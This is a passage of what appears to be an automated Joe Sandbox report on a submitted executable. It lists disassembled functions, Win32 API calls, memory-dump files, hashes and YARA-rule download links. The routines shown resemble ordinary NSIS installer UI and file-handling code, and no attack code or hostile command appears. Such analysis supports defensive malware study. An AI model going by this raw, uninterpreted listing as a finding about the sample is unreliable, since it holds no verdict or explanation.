                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040530A
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004054C6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                            • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                                                                                                                                            Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404702
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404723
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 004047A5
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404824
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404840
                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                            • String ID: : Completed$N
                                                                                                                                                                            • API String ID: 3103080414-2140067464
                                                                                                                                                                            • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                                                                                                                                            • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                                                                                                                                            • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                            Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                            • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                                                                                                                                            • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                                                                                                                                            Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404525
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040453D
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404550
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00404560
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040457A
                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                            • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                                                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                            • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                                                                                                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                              • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                            • String ID: 9
                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                            • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                            • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                            • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                                                                                                                                            Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                            • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 589700163-1201062745
                                                                                                                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                                                                                                                                            Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404E41
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E5B
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                            • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                                                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                            • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                                                                                                                                            Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                            • MulDiv.KERNEL32(00110DF8,00000064,?), ref: 00402FDC
                                                                                                                                                                            • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                            Strings
                                                                                                                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
